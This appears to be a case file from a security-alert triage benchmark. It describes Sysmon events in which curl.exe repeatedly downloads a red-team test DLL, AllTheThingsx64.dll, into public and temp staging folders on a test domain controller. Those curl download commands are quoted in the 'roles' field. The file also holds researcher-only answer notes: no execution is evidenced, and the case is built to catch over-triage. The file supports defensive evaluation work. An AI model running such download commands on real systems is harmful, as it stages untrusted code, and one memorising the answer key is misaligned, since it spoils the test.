{
  "case_id": "ING-001",
  "split": "dev",
  "source_log": "attack_data-master/datasets/attack_techniques/T1105/atomic_red_team/windows-sysmon_curl.log",
  "staged_export": "extracted/ing001_events.json",
  "sourcetypes_present": [
    "Microsoft-Windows-Sysmon/Operational"
  ],
  "selection": {
    "A0": "34354060",
    "EV": [
      "34354105",
      "34354107",
      "34354151",
      "34354153",
      "34354196",
      "34354198",
      "34354241"
    ]
  },
  "roles": {
    "34354060": "triggering alert: curl.exe -k https://github.com/.../AllTheThingsx64.dll -o c:\\users\\public\\music\\allthethingsx64.dll — an insecure external download of a DLL to a Public path, via cmd.exe",
    "34354105": "file-create: allthethingsx64.dll written to C:\\Users\\Public\\Music (the payload lands on disk)",
    "34354107": "second download: curl --output c:\\users\\public\\music\\allthethingsx64.dll",
    "34354151": "file-create: allthethingsx64.dll (Public\\Music) from the second download",
    "34354153": "third download: curl -o c:\\programdata\\allthethingsx64.dll",
    "34354196": "file-create: allthethingsx64.dll written to C:\\ProgramData",
    "34354198": "fourth download: curl -o C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\2\\allthethingsx64.dll",
    "34354241": "file-create: allthethingsx64.dll written to the user Temp directory"
  },
  "derivations": [],
  "metadata": {
    "case_name": "curl_dll_staging",
    "security_proposition": "The staged DLL was executed or loaded within the retained Sysmon window.",
    "case_directory": "ING-001_curl_dll_staging",
    "status": "audited_dev_2026-07-16",
    "dataset": "Splunk Attack Data (attack_techniques)",
    "stored_filename": "ing001_curl_download_sysmon.log",
    "created_date": "2026-07-05",
    "attack_category": {
      "category": "Ingress Tool Transfer (download staged, not executed)",
      "candidate_attack_mapping": "T1105",
      "model_visible": false,
      "note": "RESEARCHER-INTENT: evidence_condition = MISSING. curl.exe makes four insecure (-k) external downloads of AllTheThingsx64.dll to classic staging locations. No execution, image load, or rundll32/regsvr32 invocation of that object is present in the retained 0.46-second Sysmon source, and its content/reputation is not established by these events. The bounded confirming outcome is not evidenced. Calibration role = over-triage-prone (down-rank): a model must not conclude confirmed infection from staging alone. Do not leak to model."
    },
    "tier": {
      "tier": 1,
      "sensors": [
        "Sysmon"
      ],
      "why_single_source": "windows-sysmon_curl.log is host win-dc-469, Sysmon only (EID 1 process-create + EID 11 file-create used; EID 7/10/12 curl-internal noise excluded). Single host, single sensor, verified."
    },
    "splunk": {
      "index": "attack_data",
      "source": "ing001_curl_download_sysmon",
      "sourcetype": "XmlWinEventLog"
    },
    "case_scope": {
      "scope_type": "ingress_download_staged_not_executed",
      "primary_host": "win-dc-469.attackrange.local",
      "primary_user": "Administrator (via cmd.exe -> curl.exe)",
      "boundary_definition": [
        "A0 = the first curl download of AllTheThingsx64.dll to C:\\Users\\Public\\Music (34354060).",
        "EV = the three further curl downloads (Public\\Music, ProgramData, Temp) and the four allthethingsx64.dll file-creates confirming the payload on disk.",
        "EXCLUDED: the curl-internal image loads / process access / registry events (EID 7/10/12/5/25) that are download plumbing, not evidence.",
        "ABSENT in the retained source (the crux): no execution (EID1), image load (EID7), or rundll32/regsvr32 invocation of allthethingsx64.dll. The source covers only the bounded download burst and must not support an unbounded claim that the object never executed later."
      ],
      "absence_audit": {
        "confirmation": "Sysmon ProcessCreate, ImageLoad, or rundll32/regsvr32 invocation involving allthethingsx64.dll",
        "sensor": "Microsoft-Windows-Sysmon/Operational",
        "host": "win-dc-469.attackrange.local",
        "raw_source": "_splunk_ingest/ing001_curl_download_sysmon.log",
        "source_window_utc": {
          "start": "2021-10-19T16:32:41.994656500Z",
          "end": "2021-10-19T16:32:42.454400000Z"
        },
        "adequacy_note": "The retained source is a short approximately 0.46-second capture of the download burst; the claim is limited to execution not being evidenced within that source.",
        "result": "zero matching execution, image-load, or rundll32/regsvr32 events"
      }
    },
    "main_alert_selection": {
      "selection_method": "A LOLBin/curl download of a DLL from an external URL to a staging path is a common T1105 detection trigger.",
      "selection_reason": "34354060 is the first curl download; the following downloads and file-creates establish the staging, while the absence of execution is the point."
    },
    "correlation_keys": [
      "host",
      "time_window",
      "Image==curl.exe",
      "TargetFilename==allthethingsx64.dll",
      "external_url"
    ],
    "event_groups": [
      {
        "group": "downloads",
        "event_record_ids": [
          "34354060",
          "34354107",
          "34354153",
          "34354198"
        ],
        "description": "Four curl downloads of AllTheThingsx64.dll to Public\\Music, ProgramData, and Temp."
      },
      {
        "group": "payload_on_disk",
        "event_record_ids": [
          "34354105",
          "34354151",
          "34354196",
          "34354241"
        ],
        "description": "The four allthethingsx64.dll file-creates."
      }
    ],
    "curation_notes": [
      {
        "topic": "missing_intent",
        "event_record_id": "",
        "note": "RESEARCHER-PRIVATE: MISSING / over-triage-prone. A DLL was staged to disk, but execution or loading is not evidenced within the short retained source and its malicious nature is unconfirmed."
      },
      {
        "topic": "no_execution",
        "event_record_id": "",
        "note": "Verified within the retained 0.46-second source: no EID1 process with Image=allthethingsx64.dll, no EID7 image-load of it, and no rundll32/regsvr32 invocation. No claim is made about activity after the source ends."
      },
      {
        "topic": "benign_source_hint",
        "event_record_id": "34354060",
        "note": "The download URL is github.com/redcanaryco/atomic-red-team/.../T1218.010/bin/AllTheThingsx64.dll — a known red-team test repository. A secondary counter-hint reinforcing that the payload's malice is unconfirmed."
      }
    ],
    "experimental_role": {
      "used_for": [
        "ingress_missing_exemplar",
        "over_triage_down_rank_test",
        "staging_without_execution_rule_dev"
      ],
      "eligible_for_final_heldout_metrics": false
    },
    "review_status": "reviewed_for_benchmark_v1.1",
    "review_required": {
      "ground_truth": "Ground truth reviewed and frozen under benchmark rubric v1.1."
    }
  }
}
